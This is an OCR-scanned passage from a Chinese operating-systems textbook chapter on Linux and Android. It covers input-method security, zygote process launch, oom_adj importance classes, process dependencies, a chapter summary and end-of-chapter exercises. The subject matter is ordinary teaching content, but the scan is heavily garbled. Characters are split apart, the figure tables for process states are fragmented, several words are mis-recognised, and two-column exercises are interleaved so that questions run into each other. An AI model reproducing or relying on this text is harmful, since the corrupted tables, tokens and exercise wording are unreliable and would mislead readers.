允许 用 户 对 应 用 程序 提供 输入 ， 尤 其 是 以 屏幕 键盘 的 形式 。 这 是 操作 系统 中 一 种 高 度 敏感 的 交互 行为 ， 
因为 很 多 个 人 信息 都 会 经 过 输入 法 应 用 程序 ， 包 括 用 户 输入 的 密码 。 

可 能 作为 输入 法 的 应 用 程序 的 清单 中 ， 包 含 一 个 匹配 系统 输入 法 协议 的 意图 过 滤器 ， 应 用 程序 在 其 
中 声明 输入 服务 。 然 而 这 并 不 会 自动 使 该 应 用 程序 成 为 一 种 输入 法 ， 若 无 其 他 动作 ， 该 应 用 程序 的 沙 箱 
也 不 具有 进行 输入 法 操作 的 能 力 。 

Android 的 系统 设 定 中 包括 一 个 选择 输入 法 的 用 户 界面 。 这 个 界面 显示 所 有 已 安装 的 应 用 程序 中 可 
用 的 输入 法 ， 以 及 它们 是 否 被 启用 。 如 果 用 户 希 望 使 用 一 种 新 的 输入 法 ， 那 么 在 完成 安装 相应 的 应 用 程 
序 后 ， 用 户 需要 进入 这 个 系统 设 定 用 户 界 面 来 启用 它 。 启 用 时 ， 系 统 同 时 也 会 通知 用 户 此 行为 会 允许 该 
应 用 程序 执行 何 种 操作 。 

即使 一 个 应 用 程序 已 经 启用 为 输入 法 ，Android 也 使 用 细 粒 度 访问 控制 技术 来 限制 它 带 来 的 影响 。 
例如 ， 仅 有 正在 被 使 用 为 当前 输入 法 的 应 用 程序 可 以 进行 特殊 交互 行为 ， 如 果 用 户 启用 了 多 种 输入 法 
(比如 软 键盘 和 语音 输入 ) ， 那 么 只 有 正 处 于 活动 状态 的 输入 法 能 在 其 沙 箱 中 拥有 这 些 功 能 。 甚 至 正在 被 
使 用 的 当前 输入 法 也 被 附加 的 条 件 限制 了 它 可 进行 的 操作 ， 如 限制 它 只 能 和 当前 具有 输入 光标 的 窗口 进 
行 互 动 。 

10.8.12 进程 模型 

Linux 的 传统 进程 模型 是 用 fork 指 令 来 创建 新 进程 ， 然 后 用 exec 指 令 使 用 待 运行 的 源码 初始 化 该 进程 
并 开始 执行 。shell 负 责 实 现 进程 执行 、 创 建新 进程 、 执 行 所 需 的 进程 来 运行 shell 指 令 。 当 指令 结束 时 ， 
进程 被 从 Linux 中 移 除 。 

Android 使 用 的 进程 有 些 不 同 。 在 之 前 的 应 用 程序 章节 中 已 有 讨论 ， 活 动 管理 器 是 Android 负 责 正 在 
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运行 的 应 用 程序 的 管理 的 一 部 分 。 活 动 管理 器 协调 新 应 用 程序 进程 的 启动 ， 决 定 哪些 应 用 程序 能 在 其 中 
运行 ， 哪 些 已 不 再 需要 。 

1. 启动 进程 

为 了 启动 新 进程 ， 活 动 管理 器 需要 与 zygote 通 信 。 活 动 管理 器 首先 开始 ， 它 创建 一 个 与 zygote 相 连 
的 专用 接口 ， 通 过 接口 发 送 一 条 指令 ， 表 示 它 需要 启动 一 个 进程 。 这 条 指令 主要 描述 需要 创建 的 沙 箱 : 
新 进程 运行 所 需 的 UID， 以 及 需要 遵守 的 安全 性 制约 。zygote 需 要 作为 根来 运行 : 创建 新 进程 时 ， 它 合 
理 配置 运行 所 需 的 UID， 最 终 下 放 根 权限 ， 将 进程 改 为 该 UID。 

回想 之 前 对 于 Android 应 用 程序 的 讨论 , 活动 管理 器 维护 关于 活动 执行 (图 10-52)、 服 务 (图 10-57)、 
广播 (对 接收 器 的 广播 ， 图 10-60) 以 及 内 容 提 供 器 (图 10-61) 的 动态 信息 。 活 动 管理 器 利用 这 些 信息 
来 实现 应 用 程序 进程 的 创建 与 管理 。 例 如 ， 当 应 用 程序 启动 器 用 一 个 启动 活动 的 新 意图 进行 系统 调用 时 
(图 10-52)， 正 是 活动 管理 器 来 负责 运行 这 个 新 的 应 用 程序 。 

图 10-67 展 示 了 在 一 个 新 进程 中 启动 活动 的 流程 。 图 中 每 一 步 的 细节 如 下 : 

1) 某 个 现 有 进程 (如 应 用 程序 启动 器 ) 调用 活动 管理 器 ， 发 出 意图 ， 描 述 它 想 要 启动 的 新 活动 。 

2) 活动 管理 器 要 求 封 装 管理 器 将 这 个 意图 解析 为 一 个 明确 的 组 件 。 

3) 活动 管理 器 判断 这 个 应 用 程序 的 进程 并 未 正在 运行 ， 然 后 向 zygote 请 求 一 个 具有 合适 UID 的 新 进程 。 

4) zygote 进 行 一 次 fork 指 令 ， 克 隆 自 己 来 创造 一 个 新 进程 ， 下 放权 限 并 配置 新 进程 的 UID 和 沙 箱 ， 
初始 化 该 进程 的 Dalvik， 使 得 Java runtime 开 始 完全 执行 。 例 如 ， 它 需要 在 fork 后 启动 垃圾 收集 等 线程 。 

5) 新 进程 如 今 是 一 个 zygote 的 克隆 ， 并 运行 着 完全 配置 好 的 Java 环 境 。 它 回调 活动 管理 器 ， 询 问 后 
者 “我 该 做 什么 ”。 

6) 活动 管理 器 返回 即将 启动 的 应 用 程序 的 完整 信息 ， 如 源码 位 置 等 。 

7) 新 进程 读 取 应 用 程序 的 源码 ， 开 始 运行 。 

8) 活动 管理 器 将 所 有 即将 进行 的 操作 发 送 给 新 进程 ， 在 此 处 为 “启动 活动 X”。 

9) 新 进程 收 到 指令 ， 启 动 活动 ， 实 体 化 合适 的 Java 类 并 执行 。 

注意 ， 当 活动 启动 时 ， 应 用 程序 的 进程 可 能 已 经 正在 运行 了 。 在 这 种 情况 下 ， 活 动 管理 器 会 直接 跳 
转 到 末尾 ， 向 该 进程 发 送 一 条 新 指令 ， 让 它 实 体 化 并 执行 合适 的 组 件 。 如 果 合 适 ， 这 会 导致 一 个 额外 的 
活动 实例 在 应 用 程序 中 运行 ， 如 图 10-56 中 所 示 。 


system_server 进 程 应 用 程序 进程 











创建 新 进程 


zygote 进 程 


图 10-67 启动 新 应 用 程序 进程 的 流程 
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2. 进程 生命 周期 

活动 管理 器 也 负责 判断 何 时 进程 不 再 被 需要 。 活动 管理 器 记录 一 个 进程 中 运行 的 所 有 活动 、 接 收 器 、 
服务 以 及 内 容 提供 器 ， 据 此 可 判断 该 进程 的 重要 程度 。 

回想 Android 内 核 中 的 内 存 溢出 强制 结束 指令 ， 使 用 一 个 进程 的 00om_adj 进 行 严格 排序 ， 决 定 哪 个 进 
程 需要 优先 强制 结束 。 活 动 管理 器 负责 基于 每 个 进程 的 状态 ， 通 过 将 其 归 类 于 几 个 主要 用 途 ， 从 而 合理 
设 定 其 oom_adj。 图 10-68 展 示 了 几 个 主要 类 别 ， 按 重要 程度 从 高 到 低 排序 。 最 右 一 栏 为 属于 此 类 别 的 进 
程 被 赋予 的 典型 oom_adj 值 。 














a a oaa 
系统 和 守护 进程 





[| 
总 在 运行 的 应 用 程序 进程 
| FOREGROUND | 正在 与 用 交互 | 0 | 
[WSI | Pee 1 | 
3 


图 10-68 主要 进程 类 别 


当 RAM 内 存 不 足 时 ， 系 统 已 经 完成 了 进程 的 配置 ， 使 得 内 存 溢出 强制 结束 命令 优先 中 止 缓存 
(cached) 类 别 的 进程 ， 尝 试 重新 取得 足够 的 所 需 内 存 ， 随 后 中 止 主 界面 (home) %91, AR (service) 
类 别 ， 以 此 类 推 。 在 同一 个 oom_adj 水 平 中 ， 它 将 优先 中 止 内 存 占用 较 大 的 进程 。 

现在 我 们 已 经 了 解 了 Android 如 何 决定 何 时 启动 进程 、 如 何 将 进程 按 重要 性 归 类 。 现 在 我 们 需要 决定 
何 时 退出 进程 了 ， 没 错 吧 ? 我 们 是 否 真 的 需要 再 做 一 些 事情 来 退出 进程 呢 ? 答案 是 ， 我 们 不 需要 。 在 
Android 中 ， 应 用 程序 从 不 会 完全 退出 。 系 统 会 把 不 再 需要 的 进程 留 在 那里 ， 依 靠 内 核 根据 需要 中 止 它们 。 

3. 进程 依赖 性 

现在 ， 我 们 已 经 全 面 了 解 了 单个 Android 进 程 是 如 何 管理 的 。 然 而 ， 存 在 一 个 复杂 化 的 问题 ， 进 程 
之 间 的 依赖 性 。 

例如 ， 考 虑 先前 的 相机 应 用 程序 ， 假 设 已 经 拍 到 了 照片 。 这 些 照 片 不 是 操作 系统 的 一 部 分 ， 它 们 是 
由 相机 应 用 程序 中 的 一 个 内 容 提 供 器 实现 的 。 其 他 应 用 程序 也 许 希 望 访 问 这 些 图 片 数据 ， 成 为 相机 应 用 
程序 的 一 个 客户 。 S 

进程 之 间 的 依赖 性 可 能 发 生 在 内 容 提 供 器 上 (通过 简单 访问 提供 器 ): 或 是 服务 上 (通过 绑 定 至 一 个 
服务 ) 。 无 论 哪 种 情况 ， 操 作 系 统 必 须 记 录 这 些 依赖 性 ， 并 合理 管理 这 些 进 程 。 : 

进程 依赖 性 会 影响 两 个 关键 事实 : 何 时 创建 进程 〈 以 及 进程 内 部 的 组 件 ) ， 进 程 的 oom_adj 重 要 程度 
值 是 什么 。 回 想 一 个 进程 的 重要 性 取决 于 其 中 最 重要 的 组 件 ， 一 个 进程 的 重要 性 还 取决 于 依赖 它 的 最 重 
要 的 其 他 进程 。 

以 相机 应 用 程序 为 例 ， 它 的 进程 和 它 的 内 容 提供 器 都 不 是 总 在 运行 的 ， 当 某 个 其 他 应 用 程序 需要 访 
问 它 的 内 容 提供 器 时 才 会 被 创建 。 当 相机 的 内 容 提供 器 被 访问 时 ， 相 机 进程 会 被 认为 至 少 具 有 与 使 用 它 
的 应 用 程序 同等 的 重要 程度 。 

为 了 计算 每 个 进程 的 最 终 重要 程度 ， 系 统 需要 维护 进程 之 间 的 依赖 图 。 每 个 进程 都 有 其 中 正在 运行 
的 服务 与 内 容 提供 器 列表 ， 而 每 个 服务 与 内 容 提 供 器 则 有 正在 使 用 它 的 其 他 进程 列表 。( 这 些 列表 在 活 
动 管理 器 内 部 进行 维护 ， 所 以 应 用 程序 不 可 能 伪造 列表 。) 遍历 一 个 进程 的 依赖 图 时 ， 需 要 遍历 该 进程 
的 所 有 服务 和 内 容 提供 器 ， 以 及 使 用 这 些 服 务 和 内 容 提 供 器 的 所 有 其 他 进程 。 

图 10-69 展 示 了 考虑 到 多 个 进程 间 的 依赖 性 时 ， 它 们 可 能 处 于 的 一 种 典型 状态 。 这 个 例子 中 包含 两 
个 依赖 关系 ， 基 于 使 用 一 个 相机 内 容 提 供 器 来 把 一 幅 图 片 添加 至 电子 邮件 的 附件 中 ， 如 图 10-66 所 示 。 
首先 是 当前 的 前 景 电 子 邮件 应 用 程序 ， 它 正在 使 用 相机 应 用 程序 来 加 载 一 个 附件 ， 这 会 将 相机 应 用 程序 
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的 重要 程度 提高 到 和 电子 邮件 应 用 程序 相同 的 水 平 。 其 次 ， 相 似 地 ， 音 乐 应 用 程序 正在 使 用 一 项 服务 ， 
在 背景 中 播放 音乐 ， 因 此 与 媒体 进程 具有 依赖 关系 ， 使 其 能 够 访问 用 户 的 音乐 媒体 库 。 


EERE 
REREAD 
i 总 在 运行 


| phone | 为 实现 电话 功能 而 总 在 运行 | PERSISTENT | 
| emait | 当前 前 景 应 用 程序 | FOREGROUND | 
| media | 因 需 要 访问 用 户 音乐 媒体 而 被 音乐 应 用 程序 使 用 

download 
应 用 程序 启动 器 ， 未 被 使 用 


[mep ee 


图 10-69 进程 重要 程度 的 典型 状态 


考虑 若 图 10-69 中 的 状态 发 生变 化 ， 电 子 邮件 应 用 程序 完成 了 加 载 附件 ， 不 再 需要 使 用 相机 应 用 程 
序 的 内 容 提 供 器 。 图 10-70 展 示 了 进程 状态 将 会 如 何 变 化 。 注 意 ， 因 为 相机 应 用 程序 不 再 需要 ， 所 以 它 
的 重要 程度 不 再 是 前 景 (foreground) 类 别 ， 而 是 缓存 (cached) 类 别 。 缓 存 相 机 应 用 程序 也 将 更 早 的 
地 图 应 用 程序 在 缓存 类 别 的 近期 最 少 使 用 (LRU) 列表 中 向 下 推 了 一 位 。 


| 进程 | 状态 | 重要 程度 
操作 系统 核心 部 分 
能 而 总 在 运行 
音乐 
BAN 日 SA 





进程 
|_phone | 为 实现 电话 功能 而 总 在 运行 | PERSISTENT | 
| email | 当前 前 景 应 用 程序 ” |FOREGROUND| 
| media | 因 和 需要 访问 用 户 音乐 媒体 而 被 音乐 应 用 程序 使 用 | PERCEPTIBLE | 
Se 
先前 使 用 过 的 相机 应 用 程序 CACHED 

maps | 先前 使 用 过 的 地 四 应 用 可 ”| CACHED | 


图 10-70 电子 邮件 应 用 程序 不 再 使 用 相机 应 用 程序 后 的 进程 状态 


这 两 个 例子 对 缓存 进程 的 重要 性 进行 了 最 终 展 示 。 当 电子 邮件 应 用 程序 再 一 次 需要 使 用 相机 内 容 提 
供 器 时 ， 其 对 应 的 进程 一 般 已 经 被 设 定 为 缓存 类 别 。 而 再 次 使 用 相机 ， 则 只 是 将 该 进程 提升 回 前 景 类 别 ， 
并 重新 建立 与 内 容 提 供 器 的 连接 ， 而 此 时 内 容 提供 器 已 经 做 好 数据 库 初 始 化 等 准备 工作 了 。 


10.9 小 结 


Linux 一 开始 是 一 个 开源 的 类 UNIX 系 统 ， 而 今天 它 已 经 广泛 应 用 于 各 种 系统 ， 从 智能 手机 和 笔记 本 
到 超级 计算 机 。 它 有 三 种 主要 接口 : shell、C 函 数 库 和 系统 调用 。 此 外 ， 通 常 使 用 图 形 用 户 界面 以 简化 
用 户 与 系统 的 交互 。shell 允许 用 户 输入 命令 来 执行 。 这 些 命令 可 能 是 简单 的 命令 、 管 线 或 者 复杂 的 命令 
结构 。 输 入 和 输出 可 以 被 重 定向 。C 函 数 库 包括 了 系统 调用 和 许多 增强 的 调用 ， 例 如 用 于 格式 化 输出 的 
printf。 实 际 的 系统 调用 接口 是 依赖 于 体系 结构 的 ， 在 x86 平 台 上 大 约 有 250 个 系统 调用 ， 每 个 系统 调用 
做 需要 做 的 事情 ， 不 会 做 多 余 的 事情 。 

Linux 中 的 关键 概念 包括 进程 、 内 存 模型 、I/O 和 文件 系统 。 进 程 可 以 创建 子 进程 ,形成 一 棵 进程 树 。 
Linux 中 的 进程 管理 与 其 他 的 UNIX 系 统 不 太一 样 ，Linux 系统 把 每 一 个 执行 体 一 一 单线 程 进程 ， 或 者 多 
线程 进程 中 的 每 一 个 线程 或 者 内 核 一 一 看 做 不 同 的 任务 。 一 个 进程 ， 或 者 统称 为 一 个 任务 ， 通 过 两 个 关 
键 的 部 分 来 表示 ， 即 任务 结构 和 描述 用 户 地 址 空间 的 附加 信息 。 前 者 常 驻 内 存 ， 后 者 可 能 被 换 出 内 存 。 
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进程 创建 是 通过 复制 父 进程 的 任务 结构 ， 然 后 将 内 存 映像 信息 设置 为 指向 父 进程 的 内 存 映像 。 内 存 映 像 
页 面 的 真正 复制 仅 当 在 共享 不 允许 和 需要 修改 内 存单 元 时 发 生 。 这 种 机 制 称 为 写 时 复制 。 进 程 调度 是 通 
过 加 权 公 平 队列 算法 实现 的 ， 而 该 算法 使 用 一 个 红 黑 树 来 负责 任务 的 队列 管理 。 

每 个 进程 的 内 存 模 型 由 三 个 部 分 组 成 : 代码 、 数 据 和 堆栈 。 内 存 管 理 采用 分 页 式 。 一 个 常 驻 内 存 的 
表 跟 踪 每 一 页 的 状态 ， 页 面 守护 进程 采用 一 种 修改 过 的 双 指 针 时 钟 算法 保证 系统 有 足够 多 的 空闲 页 。 

可 以 通过 特殊 文件 访问 IO 设备 ， 每 个 设备 都 有 一 个 主 设备 号 和 次 设备 号 。 块 设备 IO 使 用 内 存 缓存 
磁盘 块 ， 以 减少 访问 磁盘 的 次 数 。 字 符 IO 可 以 工作 在 原始 模式 ， 或 者 字符 流 可 以 通过 行规 则 加 以 修改 。 
网 络 设备 稍 有 不 同 ， 它 关联 了 整个 网 络 协议 模块 来 处 理 网 络 数据 包 流 。 

文件 系统 由 文件 和 目录 所 组 成 的 层次 结构 组 成 。 所 有 磁盘 都 挂 载 到 一 个 有 唯一 根 的 目录 树 中 。 文 件 
可 以 从 文件 系统 的 其 他 地 方 连接 到 一 个 目录 下 。 要 使 用 文件 ， 首 先 要 打开 文件 ， 这 会 产生 一 个 文件 描述 
符 用 于 接 下 来 的 读 和 写 。 文 件 系 统 内 部 主要 使 用 三 种 表 : 文件 描述 符 表 、 打 开 文 件 描 述 表 和 i 节点 表 。 
其 中 i 节点 表 是 最 重要 的 表 ， 包 含 了 文件 管理 所 需要 的 所 有 信息 和 文件 位 置信 息 。 目 录 和 设备 ， 以 及 其 
他 特殊 文件 也 都 表示 为 文件 。 

保护 基于 对 所 有 者 、 同 组 用 户 和 其 他 人 的 读 、 写 和 执行 的 访问 控制 。 对 目录 而 言 ， 执 行 位 指示 是 否 
允许 搜索 。 

Android 是 一 个 允许 应 用 程序 在 移动 设备 上 运行 的 平台 。 它 基于 Linux 内 核 ， 但 在 Linux 的 上 层 由 一 
个 庞大 的 软件 体 组 成 ， 并 对 Linux 的 内 核 进行 了 少量 的 修改 。Android 的 大 部 分 代码 是 用 Java 写 的 ， 应 用 
程序 也 是 用 Java 写 的 ， 然 后 依次 被 编译 成 Java 字 节 码 和 Dalvik 字 市 码 。Android 应 用 程序 的 通信 是 通过 一 
种 受 保护 的 消息 传递 实现 的 ， 这 种 消息 传递 被 称 为 消息 事务 。 所 谓 的 Binder 则 是 一 种 特殊 的 Linux 内 核 模 
型 ， 用 来 处 理 进 程 间 的 通信 。 

Android 软 件 包 是 自 包 含 的 ， 并 含有 一 个 用 来 描述 包 中 内 容 的 说 明文 件 。 它 包含 了 活动 (activities), 
接收 器 (receivers)、 内 容 提 供 器 (content providers) 和 意图 (intent)。Android 的 安全 模型 与 Linux 模 型 
不 同 ， 它 对 每 个 应 用 程序 都 使 用 了 沙 箱 技术 ， 因 为 所 有 的 应 用 程序 均 被 视 为 不 可 信 的 。 
习题 
1. 解释 如 何 用 C 编 写 UNIX 以 使 其 更 容易 被 移植 到 ”8. 一 个 用 户 在 终端 键入 如 下 命令 : 

新 机 器 。 alblc& 
.POSIX 接 口 定 义 了 一 组 库 程 序 。 解 释 为 什么 要 dlelf& 
使 用 POSIX 规 范 库 程 序 ， 而 不 是 使 用 系统 调用 当 shell 处 理 完 这 些 命令 后 ， 有 多 少 新 的 进程 在 
接口 。 运行 ? 
.Linux 在 被 移植 到 新 架构 时 依赖 于 GCC 编 译 器 。 . 当 Linux shell 命 令 启 动 一 个 进程 ， 它 把 它 的 环 
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描述 这 种 依赖 性 的 一 个 优点 和 一 个 缺点 。 境 变量 ， 如 HOME 放 到 进程 栈 中 ， 使 得 进程 可 
4. 一 个 目录 包含 以 下 文件 : 以 找到 它 的 home 目 录 。 如 果 这 个 进程 之 后 进行 
aardvark feret koala porpoise unicorn 派生 ， 那 么 它 的 子 进程 也 能 自动 地 得 到 这 些 变 
bonefish grunion llama quacker vicuna 量 吗 ? 

capybara hyena marmot rabbit weasel 10. 在 如 下 的 条 件 下 : 文本 大 小 = 100KB ， 数 所 
dingo ibex nuthatch seahorse yak 大 小 = 20KB ， 栈 大 小 = 10KB ， 任 务 结构 = 
emu jellyfish ostrich tuna zebu 1KB ， 用 户 结构 = 5KB， 一 个 传统 的 UINX 系 
哪些 文件 能 通过 命令 Is [abe]*e* 被 罗列 出 来 ? 统 要 花 多 长 时 间 派 生 一 个 子 进程 ”内 核 陷阱 和 
5. 下 面 的 Linux shell 管 线 命令 的 功能 是 什么 ? 返回 的 时 间 用 lms， 机 器 每 50ns 就 可 以 复制 一 
grep nd xyz | we -| 个 32 位 的 字 。 共 享 文本 段 ， 但 是 不 共享 数据 自 
6. 基于 标准 输出 写 一 个 能 打印 z 文件 的 第 八 行 的 和 堆栈 段 。 


_ 


Linux 管 线 命令 。 11. 当 多 净 字 节 程序 变 得 越 来 越 普遍 ， 花 费 在 执行 
.标准 输出 和 标准 错误 对 于 终端 都 是 默认 的 ， fork 系 统 调 用 以 及 复制 调用 进程 的 数据 段 和 堆 
Linux 为 什么 还 要 区 分 两 者 ? 栈 段 的 时 间 也 成 比例 地 增长 。 当 在 Linux 中 执 
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行 fork ， 父 进程 的 地 址 空间 是 没有 被 复制 的 ， 
不 像 传统 的 fork 语 义 那 样 。Linux 是 怎样 防止 子 
进程 做 一 些 会 彻底 改变 fork 语 义 的 行动 的 ? 

12. 为 什么 nice 指 令 的 负 人 参数 要 专门 保留 给 超级 用 户 ? 

13. 非 实时 Linux 进 程 的 优先 级 是 从 100 到 139， 默 
认 的 静态 优先 级 是 什么 ? 如 何 使 用 优先 值 
(nice 值 ) 来 改变 这 种 优先 级 ? 

14. 当 一 个 进程 进入 僵 死 状态 后 ， 和 剥夺 它 的 内 存 有 
意义 吗 ? 为 什么 ? 

15. 什么 硬件 概念 与 信号 量 密切 相关 ? 给 出 两 个 例 
子 来 说 明 信 和 号 量 是 如 何 被 使 用 的 。 

16. 你 认为 为 什么 Linux 的 设计 者 禁止 一 个 进程 向 
不 属于 它 的 进程 组 的 另 一 个 进程 发 送信 号 呢 ? 
17. 一 个 系统 调用 通常 用 一 个 软件 中 断 (陷入 ) 指 
令 来 实现 。 一 个 普通 的 过 程 调用 也 能 在 
Pentium 硬 件 上 使 用 吗 ? 如果 能 使 用 ， 在 哪 种 
条 件 下 ? 如何 使 用 ? 如 果 不 能 ， 请 说 明 原 因 。 

18. 通常 情况 下 ， 你 认为 守护 进程 比 交 互 进程 具有 
更 高 的 优先 级 还 是 更 低 的 优先 级 ”为 什么 ? 

19. 当 一 个 新 进程 被 创建 时 ， 它 一 定 会 被 分 配 一 个 
唯一 的 整数 作为 它 的 PID 。 在 内 核 里 只 有 一 个 
计数 器 是 否 足 够 ?每 当 创建 一 个 进程 时 ， 计 数 
器 就 会 递增 ， 并 且 作 为 新 进程 的 PID。 讨 论 你 
的 结论 。 

20. 在 每 个 任务 结构 中 的 进程 项 中 ， 父 进程 的 PID 

被 储存 。 为 什么 ? 

.在 fork 系 统 调 用 中 ， 写 时 复制 机 制 被 用 作 一 个 

优选 法 ， 这 样 副本 只 有 在 一 个 进程 〈( 父 进程 或 

子 进程 ) 试图 写 入 页 面 才 会 被 创建 。 假 设 一 个 

进程 P1 成 功 创建 进程 P2 和 进程 P3。 解 释 这 种 

情况 下 页 面 共 享 是 如 何 处 理 的 。 

22. 相对 于 传统 的 UNIX fork 调 用 ，Linux 的 clone 命 令 
会 使 用 什么 样 的 sharing_flags 位 的 组 合 来 创建 常规 
的 UNIX 线 程 ? 

.A 和 B 两 个 任务 需要 执行 同样 的 工作 。 然 而 ， 
任务 A 拥有 更 高 的 优先 级 ， 需 要 给 予 更 多 的 
CPU 时 间 。 解 释 一 下 它 是 如 何在 每 一 个 Linux 
调度 器 (O(1) 和 CFS 调 度 器 ) 下 实现 的 ? 

24. 一 些 UNIX 系 统 是 tickless， 这 意味 着 它们 没有 
周期 时 钟 中 断 。 为 什么 要 这 样 设计 ? 同时 ， 
tickless 对 只 运行 一 个 进程 的 计算 机 〈 如 嵌入 式 
系统 ) 有 意义 吗 ? 

25. 当 引 导 Linux (或 者 大 多 数 其 他 操作 系统 ) 时 ， 
在 0 号 扇 区 的 引导 加 载 程 序 首先 加 载 一 个 引导 程 
序 ， 这 个 程序 之 后 会 加 载 操 作 系统 。 这 多 余 的 
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一 步 为 什么 是 必 不 可 少 的 ? 当然 0 号 扇 区 的 引导 
加 载 程序 直接 加 载 操作 系统 会 更 简单 的 。 

26. 某 个 编辑 器 有 100KB 的 程序 文本 ，30KB 的 初始 
化 数据 和 50KB 的 BSS。 初 始 堆栈 是 10KB。 假 
设 这 个 编辑 器 的 三 个 复制 是 同时 开始 的 。(a) 如 - 
果 使 用 共享 文本 ， 需 要 多 少 物 理 内 存 呢 ? (b) 如 
果 不 使 用 共享 文本 又 需 多 少 物 理 内 存 呢 ? 

27. 在 Linux 中 打开 文件 描述 符 表 为 什么 是 必要 的 呢 ? 

28. 在 Linux 中 ， 数 据 段 和 堆栈 段 被 分 页 并 交换 到 特 
殊 分 页 磁盘 或 分 区 的 临时 副本 上 ， 但 是 代码 段 
却 使 用 了 可 执行 二 进 制 文件 。 为 什么 ? 

29. 描述 一 种 使 用 mmap 和 信号 量 来 构造 一 个 进程 
内 部 间 通 信 机 制 的 方法 。 

30. 一 个 文件 使 用 如 下 的 mmap 系 统 调用 映射 : 
mmap(65536,32768,READ.,FLAGS ,fd,0) 


每 页 有 8KB。 当 在 内 存 地 址 72000 处 读 一 个 字 

节 时 ,访问 的 是 文件 中 的 哪个 字 节 ? 

.当前 一 个 问题 的 系统 调用 执行 后 ， 执 行 

munmap(65535,8192) 调 用 会 成 功 吗 ? 如 果 成 

功 ， 文 件 的 哪些 字 节 会 保持 映射 ?如 果 失 败 ， 

为 什么 呢 ? 

.一 个 页 面 故 障 会 导致 错误 进程 终止 吗 ? 如果 

会 ， 举 一 个 例子 。 如 果 不 会 ， 请 解释 原因 。 

.在 内 存 管理 的 伙伴 系统 中 ， 两 个 相 邻 的 同样 大 

小 的 空闲 内 存 块 有 没有 可 能 同时 存在 而 不 会 被 

合并 到 一 个 块 中 ? 如 果 有 可 能 ， 解 释 是 怎么 样 

的 情况 ， 如 果 没 有 可 能 ， 说 明 为 什么 

. 据说 在 代码 段 中 分 页 分 区 要 比分 页 文件 性 能 更 

好 。 为 什么 呢 ? 

. 举 两 个 例子 说 明 相对 路 径 名 比 绝对 路 径 名 有 优势 。 

. 以 下 的 加 锁 调 用 是 由 一 个 进程 集合 产生 的 ， 对 

于 每 个 调用 ， 说 明 会 发 生 什么 事情 。 如 果 一 个 

进程 没 能 够 得 到 锁 ， 它 就 被 阻塞 。 

(a) A 想 要 0 到 10 字 节 处 的 一 把 共享 锁 。 

(b) B 想 要 20 到 30 字 节 处 的 一 把 互 斥 锁 。 

(c) C 想 要 8 到 40 字 节 处 的 一 把 共享 锁 。 

(d) A 想 要 25 到 35 字 节 处 的 一 把 共享 锁 。 

(e) B 想 要 8 字 节 处 的 一 把 互 斥 锁 。 

37. 考虑 图 10-26c 中 的 加 锁 文 件 。 假 设 一 个 进程 尝 
试 对 10 和 11 字 节 加 锁 然 后 阻塞 。 那 么 ， 在 C 释 
放 它 的 锁 前 ， 还 有 另 一 个 进程 尝试 对 10 和 11 字 
节 加 锁 然后 阻塞 。 在 这 种 情况 下 语义 方面 会 产 
生 什么 问题 ?提出 两 种 解决 方法 并 证 明 。 

38. 说 明 在 什么 情况 下 一 个 进程 可 能 会 请 求 共享 锁 
或 互 斥 锁 。 请 求 互 斥 锁 的 过 程 中 可 能 会 遇 到 什 
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么 问题 ? 

如 果 一 个 Linux 文 件 拥有 保护 模式 755 ( 八 进 
till), 文件 所 有 者 、 所 有 者 所 在 组 以 及 其 他 每 
个 用 户 分 别 能 对 这 个 文件 做 什么 操作 ? 


:一些 磁带 驱动 拥有 带 编号 的 块 ， 它 能 够 在 原 地 


重 写 一 个 特定 块 同时 不 会 影响 它 之 前 和 之 后 的 
块 。 这 样 一 个 设备 能 持 有 一 个 已 加 载 的 Linux 
文件 系统 吗 ? 


.在 图 10-24 中 ， 当 打开 链接 之 后 ，Fred 和 Lisa 在 


他 们 各 自 的 目录 中 都 能 够 访问 文件 x*。 这 个 访 
问 是 完全 对 称 的 吗 ， 也 就 是 说 其 中 一 个 人 能 对 
文件 做 的 事情 另 一 个 人 也 可 以 做 ? 


.正如 我 们 看 到 的 ， 绝 对 路 径 名 从 根 目录 开始 查 


找 ， 而 相对 路 径 名 从 工作 目录 开始 查找 。 提 供 
一 种 有 效 的 方法 实现 这 两 种 查找 。 


. 当 文 件 /usr/ast/work/f 被 打开 ， 读 i 节点 和 目录 


块 时 需要 一 些 磁盘 访问 。 假 设 根 目录 的 i 节点 
始终 在 内 存 中 , 且 所 有 的 目录 都 是 一 个 块 大 小 ， 
计算 需要 的 磁盘 访问 数量 。 

一 个 Linux i 节 点 有 12 个 磁盘 地 址 放 数据 块 ， 还 
有 一 级 、 二 级 和 三 级 间接 块 。 如 果 每 一 个 块 能 
放 256 个 磁 慢 地 址 ， 假 设 一 个 磁盘 块 的 大 小 是 
IKB ， 能 处 理 的 最 大 文件 的 大 小 是 多 少 ? 

在 打开 文件 的 过 程 中 ，i 节 点 从 磁盘 中 被 读 出 ， 
并 被 放 入 内 存 中 的 节点 表 里 。 这 个 表 中 有 些 表 
项 在 磁盘 中 没有 。 其 中 一 个 就 是 计数 器 ， 它 是 
用 来 记录 i 节点 已 经 被 打开 的 次 数 。 为 什么 需要 
这 个 表 项 ? 


.在 多 CPU 平台 上 ，Linux 为 每 个 CPU 维护 一 个 


runqueue。 这 样 做 好 吗 ? 请 给 出 解释 。 

考虑 到 新 设备 驱动 可 能 在 系统 运行 时 被 载 入 内 
核 中 ， 可 加 载 模 块 的 思想 是 有 用 的 。 给 出 这 个 
思想 的 两 个 缺点 。 

pdflush 线 程 可 以 被 周期 性 地 唤醒 ， 把 多 于 30 秒 
的 旧 页 面 写 回 到 磁盘 。 这 个 为 什么 是 必要 的 ? 


-在 系统 崩溃 并 重启 后 ， 通 常 一 个 恢复 程序 将 运 


行 。 假 设 这 个 程序 发 现 一 个 磁盘 i 节点 的 连接 
数 是 2, 但 是 只 有 一 个 目录 项 引用 了 这 个 i 节点 。 
它 能 够 解决 这 个 问题 吗 ? 如 果 能 ， 该 怎么 做 ? 
猜 一 下 哪个 Linux 系 统 调 用 是 最 快 的 ? 

对 一 个 从 来 没有 被 连接 的 文件 取消 连接 可 能 
吗 ? 会 发 生 什么 ? 


.基于 本 章 提供 的 信息 ， 如 果 一 个 Linux ext2 文 


件 系统 放 在 一 个 1.44MB 的 软盘 上 ， 用 户 文件 
数据 最 大 能 有 多 少 可 以 储存 在 这 个 软盘 上 ? 假 


3 


5 


5 


5 


5 


5 


5 


6 


6 


w 


4. 


5. 


6. 


N 


Co 


O 


0. 


_ 


485 


设 磁盘 块 的 大 小 是 1KB 。 


.考虑 到 如 果 学 生成 为 超级 用 户 会 造成 的 所 有 麻 


烦 ， 为 什么 这 个 概念 还 会 出 现 ? 
